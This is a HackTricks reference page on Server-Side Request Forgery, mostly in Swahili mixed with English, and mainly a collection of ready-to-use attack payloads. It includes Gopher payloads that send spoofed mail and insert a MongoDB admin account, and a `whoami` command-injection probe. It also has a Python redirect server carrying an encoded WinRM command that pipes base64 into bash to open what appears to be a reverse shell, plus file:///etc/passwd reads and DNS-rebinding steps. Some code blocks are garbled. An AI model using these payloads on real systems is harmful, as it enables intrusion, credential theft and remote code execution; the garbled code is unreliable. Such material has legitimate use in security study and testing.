SSRF (Server Side Request Forgery)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Taarifa za Msingi

A Server-side Request Forgery (SSRF) vulnerability hutokea wakati mshambuliaji anavyodanganya server-side application ili itume HTTP requests kwa domain wanayochagua. Udhaifu huu unaweka server wazi kwa requests za nje ambazo mshambuliaji ameagiza.

Capture SSRF

Kitu cha kwanza unachopaswa kufanya ni kukamata mwingiliano wa SSRF uliotengenezwa na wewe. Ili kukamata HTTP au DNS interaction unaweza kutumia zana kama:

• Burp Collaborator
• pingb
• canarytokens
• interractsh
• http://webhook.site
• https://github.com/teknogeek/ssrf-sheriff
• http://requestrepo.com/
• https://github.com/stolenusername/cowitness
• https://github.com/dwisiswant0/ngocok - A Burp Collaborator using ngrok

Whitelisted Domains Bypass

Kwa kawaida utagundua kuwa SSRF inafanya kazi tu kwenye certain whitelisted domains au URL. Katika ukurasa ufuatao kuna mkusanyo wa mbinu za kujaribu bypass whitelist hiyo:

URL Format Bypass

Bypass via open redirect

Iwapo seva imelinindwa ipasavyo unaweza bypass all the restrictions by exploiting an Open Redirect inside the web page. Kwa sababu wavuti itaruhusu SSRF to the same domain na huenda pia itafuata follow redirects, unaweza kutumia Open Redirect to make the server to access internal any resource.
Soma zaidi hapa: https://portswigger.net/web-security/ssrf

Protokoli

• file://
• The URL scheme file:// inatajwa, ikielekeza moja kwa moja kwa /etc/passwd: file:///etc/passwd
• dict://
• URL scheme ya DICT inatumiwa kwa kupata maana au orodha za maneno kupitia protokoli ya DICT. Mfano unaonyesha URL iliyojengwa inayolenga neno maalum, database, na nambari ya entry, pamoja na mfano wa script ya PHP inayoweza kutumiwa vibaya kuunganishwa na server ya DICT kwa kutumia credentials za mshambuliaji: dict://<generic_user>;<auth>@<generic_host>:<port>/d:<word>:<database>:<n>
• SFTP://
• Imetambuliwa kama protokoli ya usafirishaji salama wa faili kupitia secure shell; mfano unaonyesha jinsi script ya PHP inaweza kutumiwa kuunganishwa na SFTP server yenye madhara: url=sftp://generic.com:11111/
• TFTP://
• Trivial File Transfer Protocol, inayofanya kazi juu ya UDP, imetajwa pamoja na mfano wa script ya PHP iliyoundwa kutuma ombi kwa TFTP server. Ombi la TFTP limefanywa kwa ‘generic.com’ kwenye port ‘12346’ kwa faili ‘TESTUDPPACKET’: ssrf.php?url=tftp://generic.com:12346/TESTUDPPACKET
• LDAP://
• Sehemu hii inahusu Lightweight Directory Access Protocol, ikisisitiza matumizi yake kwa kusimamia na kupata huduma za taarifa za directory zilizogawika juu ya mitandao ya IP. Interact with an LDAP server on localhost: '%0astats%0aquit' via ssrf.php?url=ldap://localhost:11211/%0astats%0aquit.
• SMTP
• Mbinu moja inaelezwa ya kutumia udhaifu wa SSRF kuingiliana na huduma za SMTP kwenye localhost, ikijumuisha hatua za kufunua majina ya domain za ndani na hatua za uchunguzi zaidi kulingana na taarifa hizo.

From https://twitter.com/har1sec/status/1182255952055164929
1. connect with SSRF on smtp localhost:25
2. from the first line get the internal domain name 220[ http://blabla.internaldomain.com ](https://t.co/Ad49NBb7xy)ESMTP Sendmail
3. search[ http://internaldomain.com ](https://t.co/K0mHR0SPVH)on github, find subdomains
4. connect

• Curl URL globbing - WAF bypass
• Ikiwa SSRF inatekelezwa na curl, curl ina kipengele kinachoitwa URL globbing ambacho kinaweza kusaidia kuiepuka WAF. Kwa mfano, katika hii writeup unaweza kupata mfano huu wa path traversal via file protocol:

file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}

• Gopher://
• Uwezo wa protokoli ya Gopher wa kubainisha IP, port, na bytes kwa ajili ya mawasiliano na server unajadiliwa, pamoja na zana kama Gopherus na remote-method-guesser kwa kuunda payloads. Matumizi mawili tofauti yanaonyeshwa:

Gopher://

Ukikitumia protokoli hii unaweza kubainisha the IP, port and bytes unayotaka server itume. Kisha, kwa msingi unaweza kutumia SSRF kuwasiliana na any TCP server (lakini unahitaji kujua jinsi ya kuzungumza na service kwanza).
Kwa bahati nzuri, unaweza kutumia Gopherus kuunda payloads kwa services mbalimbali. Zaidi ya hayo, remote-method-guesser inaweza kutumika kuunda gopher payloads kwa Java RMI services.

Gopher smtp

ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT

Gopher HTTP

#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body

Gopher SMTP — Back connect kwa 1337

<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.

Gopher MongoDB – Unda mtumiaji na username=admin, password=admin123, na permission=administrator

# Check: https://brycec.me/posts/dicectf_2023_challenges#unfinished
curl 'gopher://0.0.0.0:27017/_%a0%00%00%00%00%00%00%00%00%00%00%00%dd%0
7%00%00%00%00%00%00%00%8b%00%00%00%02insert%00%06%00%00%00users%00%02$db%00%0a
%00%00%00percetron%00%04documents%00V%00%00%00%030%00N%00%00%00%02username%00%
06%00%00%00admin%00%02password%00%09%00%00%00admin123%00%02permission%00%0e%00
%00%00administrator%00%00%00%00'

SSRF kupitia Referrer header & Nyingine

Programu za analytics kwenye seva mara nyingi zinarekodi Referrer header ili kufuatilia incoming links; tabia hii kwa bahati mbaya inaweza kufichua applications kwa Server-Side Request Forgery (SSRF) vulnerabilities.

Hii ni kwa sababu programu hizo zinaweza kutembelea external URLs zilizotajwa katika Referrer header ili kuchambua yaliyomo kwenye tovuti ya marejeo. Ili kugundua udhaifu huu, inapendekezwa kutumia Burp Suite plugin “Collaborator Everywhere”, ikitumia jinsi zana za analytics zinavyoshughulikia Referer header ili kutambua maeneo ya mashambulizi ya SSRF yanaoweza kutokea.

SSRF kupitia SNI data kutoka kwa certificate

Mpangilio mbaya (misconfiguration) ambao unaweza kuruhusu muunganisho kwa backend yoyote kupitia setup rahisi unaonyeshwa na mfano wa Nginx configuration:

stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}

Katika usanidi huu, thamani kutoka kwa uwanja wa Server Name Indication (SNI) hutumika moja kwa moja kama anwani ya backend. Usanidi huu unaweka wazi udhaifu wa Server-Side Request Forgery (SSRF), ambao unaweza kutumika kwa kuainisha tu anwani ya IP au jina la kikoa unalotaka katika uwanja wa Server Name Indication (SNI). Mfano wa eksploit ili kulazimisha muunganisho kwa backend yoyote, kama internal.host.com, kwa kutumia amri ya openssl ufuatao:

openssl s_client -connect target.com:443 -servername "internal.host.com" -crlf

SSRF kupitia TLS AIA CA Issuers (Java mTLS)

Baadhi ya TLS stacks zitapakua moja kwa moja intermediate CAs zilizokosekana kwa kutumia Authority Information Access (AIA) → CA Issuers URI ndani ya peer certificate. Katika Java, kuwezesha -Dcom.sun.security.enableAIAcaIssuers=true wakati wa kuendesha mTLS service kunafanya server kufuatilia URIs zinazodhibitiwa na attacker kutoka kwenye client certificate wakati wa handshake, kabla ya logic yoyote ya HTTP kuanza.

• Requirements: mTLS enabled, Java AIA fetching enabled, attacker can present a client cert with a crafted AIA CA Issuers URI.
• Triggering SSRF (Java 21 example):

java -Djava.security.debug=certpath \
-Dcom.sun.security.enableAIAcaIssuers=true \
-Dhttp.agent="AIA CA Issuers PoC" -jar server.jar
# Attacker cert AIA: http://localhost:8080
nc -l 8080 -k                      # observe the outbound fetch
curl https://mtls-server:8444 --key client-aia-key.pem --cert client-aia-localhost-cert.pem --cacert ca-cert.pem

Java certpath debug output inaonyesha CertStore URI:http://localhost:8080, na nc inakamata HTTP request yenye User-Agent inayoweza kudhibitiwa kutoka -Dhttp.agent, ikithibitisha SSRF wakati wa certificate validation.

• DoS via file://: kuweka AIA CA Issuers kuwa file:///dev/urandom kwenye hosts kama Unix kunafanya Java kuitambua kama CertStore na kusoma bytes za nasibu zisizo na kikomo, ikifanya core moja ya CPU kuwa busy na kuzuia connections zinazofuata hata baada ya client kuachana.

Wget file upload

SSRF with Command Injection

Inaweza kuwa wazo nzuri kujaribu payload kama: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`

Uundaji wa PDF

If the web page is automatically creating a PDF with some information you have provided, you can insert some JS that will be executed by the PDF creator itself (the server) while creating the PDF and you will be able to abuse a SSRF. Find more information here.

Kutoka SSRF hadi DoS

Tengeneza sessions kadhaa na jaribu kupakua faili nzito ukitumia SSRF kutoka katika sessions hizo.

SSRF PHP Functions

Angalia ukurasa ufuatao kwa ajili ya PHP functions zilizo hatarishi na hata Wordpress functions:

PHP SSRF

SSRF Redirect kwenda Gopher

Kwa baadhi ya mashambulizi unaweza kuhitaji kutuma jibu la redirect (inawezekana kutumia protocol tofauti kama gopher). Hapa kuna code mbalimbali za python kujibu kwa redirect:

# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl

class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)
self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
self.end_headers()

httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()

from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)

@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)

if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)

Proxies zilizosanidiwa vibaya kwa SSRF

Mbinu kutoka kwenye chapisho hiki.

Flask

Flask proxy: msimbo wenye udhaifu

```python from flask import Flask from requests import get

app = Flask(‘main’) SITE_NAME = ‘https://google.com’

@app.route(‘/’, defaults={‘path’: ‘’}) @app.route(‘/path:path’)

def proxy(path): return get(f’{SITE_NAME}{path}’).content

if name == “main”: app.run(threaded=False)

</details>

Flask inaruhusu kutumia **`@`** kama herufi ya mwanzo, ambayo inaruhusu kufanya **jina la mwenyeji la awali kuwa jina la mtumiaji** na kuingiza jina jipya. Ombi la shambulio:
```http
GET @evildomain.com/ HTTP/1.1
Host: target.com
Connection: close

Spring Boot

Msimbo dhaifu:

Iligunduliwa kuwa inawezekana kuanza njia ya ombi kwa alama ; ambayo inaruhusu kisha kutumia @ na kuingiza mwenyeji mpya ili kufikiwa. Ombi la shambulio:

GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close

Seva ya Wavuti ya Jumuishi ya PHP

Msimbo dhaifu wa PHP

```php

$proxy_site = $site.$current_uri; var_dump($proxy_site);

echo “\n\n”;

$response = file_get_contents($proxy_site); var_dump($response); ?>

</details>

PHP inaruhusu kutumia **herufi `*` kabla ya slash katika path ya URL**, hata hivyo, ina vikwazo vingine kama kwamba inaweza kutumika tu kwa pathname ya mizizi `/` na kwamba nukta `.` haziruhusiwi kabla ya slash ya kwanza, kwa hivyo inahitajika kutumia anwani ya IP iliyosimbwa kwa hex bila nukta kwa mfano:
```http
GET *@0xa9fea9fe/ HTTP/1.1
Host: target.com
Connection: close

DNS Rebidding CORS/SOP bypass

Ikiwa unapata matatizo ya ku-exfiltrate content kutoka local IP kwa sababu ya CORS/SOP, DNS Rebidding inaweza kutumika kuvuka kikomo hicho:

CORS - Misconfigurations & Bypass

Automated DNS Rebidding

Singularity of Origin ni zana ya kufanya DNS rebinding attacks. Inajumuisha vipengele vinavyohitajika kubadilisha IP address ya jina la DNS la attack server hadi IP ya mashine lengwa na kutumikia attack payloads ili ku-exploit software iliyo vulnerable kwenye mashine lengwa.

Pia angalia server ya umma inayokimbia katika http://rebind.it/singularity.html

DNS Rebidding + TLS Session ID/Session ticket

Requirements:

• SSRF
• Outbound TLS sessions
• Stuff on local ports

Attack:

1. Muombe mtumiaji/bot kufungua domain inayodhibitiwa na mshambuliaji
2. TTL ya DNS iwe 0 sec (hivyo victim atatafuta IP ya domain tena hivi karibuni)
3. Muunganiko wa TLS unaanzishwa kati ya victim na domain ya mshambuliaji. Mshambuliaji anaingiza payload ndani ya Session ID au Session Ticket.
4. Domain itaanzisha loop isiyo na mwisho ya redirects dhidi ya yenyewe. Lengo ni kufanya mtumiaji/bot aendelee kufikia domain hadi itafanya tena request ya DNS ya domain.
5. Katika request ya DNS sasa inatolewa private IP address (kwa mfano 127.0.0.1)
6. Mtumiaji/bot atajaribu kuanzisha tena TLS connection na ili kufanya hivyo atatumia tena Session ID/Ticket ID (ambapo payload ya mshambuliaji ilikuwa imehifadhiwa). Hivyo hongera — umefanikiwa kufanya mtumiaji/bot atakayeji-haribu mwenyewe.

Kumbuka kwamba katika shambulio hili, kama unataka kushambulia localhost:11211 (memcache) unahitaji kufanya victim aanzishe connection ya awali na www.attacker.com:11211 (the port must always be the same).
Ili kutekeleza shambulio hili unaweza kutumia zana: https://github.com/jmdx/TLS-poison/
Kwa maelezo zaidi tazama mazungumzo ambapo shambulio hili limeelezewa: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference

Blind SSRF

Tofauti kati ya blind SSRF na isiyo blind ni kwamba katika blind huwezi kuona response ya SSRF request. Hivyo ni vigumu zaidi ku-exploit kwa sababu utaweza ku-exploit tu vulnerabilities zinazojulikana vizuri.

Time based SSRF

Kwa kukagua muda wa responses kutoka server inaweza kuwa inawezekana kujua kama resource ipo au la (labda inachukua muda zaidi kufikia resource iliyo, kuliko ile isiyo).

From blid to full abusing status codes

Kulingana na blog post, baadhi ya blind SSRF zinaweza kutokea kwa sababu hata kama URL lengwa inarudisha 200 status code (kama AWS metadata), data hii haipangwi vizuri na kwa hivyo app inaweza kukataa kuionyesha.

Hata hivyo, imegundulika kwamba kutuma responses za redirect kutoka 305 hadi 309 katika SSRF kunaweza kumfanya application ifuate redirects hizi huku ikijiingiza kwenye error mode ambayo haitakagua tena muundo wa data na inaweza tu kuichapisha.

Server ya Python iliyotumika ku-exploit hili ni ifuatayo:

@app.route("/redir")
def redir():
count = int(request.args.get("count", 0)) + 1
# Pump out 305, 306, 307, 308, 309, 310 ...
weird_status = 301 + count
if count >= 10:                      # after 5 “weird” codes
return redirect(METADATA_URL, 302)
return redirect(f"/redir?count={count}", weird_status)

@app.route("/start")
def start():
return redirect("/redir", 302)

Hatua:

• Kwanza 302 inafanya app kuanza kufuata.
• Kisha inapokea 305 → 306 → 307 → 308 → 309 → 310.
• Baada ya msimbo wa 5 usio wa kawaida PoC hatimaye inarudisha 302 → 169.254.169.254 → 200 OK.

Nini kinatokea ndani ya lengo:

• libcurl yenyewe inaifuata 305–310; huweka tu msimbo usiojulikana kuwa “follow.”
• Baada ya N redirects za ajabu (≥ 5 hapa) wrapper ya application yenyewe inaamua “kuna kitu si sawa” na hubadili hadi error mode iliyokusudiwa kwa debugging.
• Katika mode hiyo inadump mnyororo mzima wa redirect pamoja na final body kurudishwa kwa caller wa nje.
• Matokeo: attacker anaona kila header + metadata JSON, mission accomplished.

Note that this is interesting to leak status codes that you couldn’t leak before (like a 200). However, if somehow you could also select the status code of the response (imagine that you can decide that the AWS metadata responds with a 500 status code), there might be some status codes that directly leak the content of the response.

HTML-to-PDF renderers as blind SSRF gadgets

Libraries such as TCPDF (and wrappers like spipu/html2pdf) will automatically fetch any URLs present in attacker-controlled HTML while rendering a PDF. Each <img> or <link rel="stylesheet"> attribute is resolved server-side via cURL, getimagesize(), or file_get_contents(), so you can drive the PDF worker to probe internal hosts even though no HTTP response is reflected to you.

<html>
<body>
<img width="1" height="1" src="http://127.0.0.1:8080/healthz">
<link rel="stylesheet" type="text/css" href="http://10.0.0.5/admin" />
</body>
</html>

• TCPDF 6.10.0 inatoa majaribio kadhaa ya upokezi kwa kila rasilimali ya <img>, hivyo payload moja inaweza kuzalisha maombi mengi (inayosaidia kwa port scans zinazotegemea timing).
• html2pdf inakopa tabia ya TCPDF kwa <img> na inaongeza upakuaji wa CSS ndani ya Css::extractStyle(), ambayo kwa urahisi huita file_get_contents($href) baada ya ukaguzi mdogo wa scheme. Dhalilisha ili kugonga huduma za loopback, RFC1918 ranges, au cloud metadata endpoints.
• Combine this SSRF primitive with the HTML-to-PDF path traversal tricks to leak both internal HTTP responses and local files rendered into the PDF.

Wale wanaofanya hardening wanapaswa kuondoa URL za nje kabla ya rendering au ku isolate renderer katika sandbox ya mtandao; hadi hapo, chukulia PDF generators kama blind SSRF proxies.

Utekelezaji wa SSRF katika cloud

If you find a SSRF vulnerability in a machine running inside a cloud environment you might be able to obtain interesting information about the cloud environment and even credentials:

Cloud SSRF

Majukwaa yenye udhaifu wa SSRF

Several known platforms contains or has contained SSRF vulnerabilities, check them in:

SSRF Vulnerable Platforms

Tools

SSRFMap

Tool to detect and exploit SSRF vulnerabilities

Gopherus

• Blog post on Gopherus

This tool generates Gopher payloads for:

• MySQL
• PostgreSQL
• FastCGI
• Redis
• Zabbix
• Memcache

remote-method-guesser

• Blog post on SSRF usage

remote-method-guesser ni scanner ya udhaifu ya Java RMI inayounga mkono operesheni za shambulio kwa udhaifu wa kawaida wa Java RMI. Most of the available operations support the --ssrf option, to generate an SSRF payload for the requested operation. Together with the --gopher option, ready to use gopher payloads can be generated directly.

SSRF Proxy

SSRF Proxy ni multi-threaded HTTP proxy server iliyoundwa ku-tunnel trafiki ya HTTP ya client kupitia HTTP servers zilizo wazi kwa Server-Side Request Forgery (SSRF).

To practice

GitHub - incredibleindishell/SSRF_Vulnerable_Lab: This Lab contain the sample codes which are vulnerable to Server-Side Request Forgery attack

Marejeo

• https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4
• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery
• https://www.invicti.com/blog/web-security/ssrf-vulnerabilities-caused-by-sni-proxy-misconfigurations/
• https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies
• Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?
• Tenable – SSRF Vulnerability in Java TLS Handshakes That Creates DoS Risk
• RFC 5280 §4.2.2.1 Authority Information Access

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.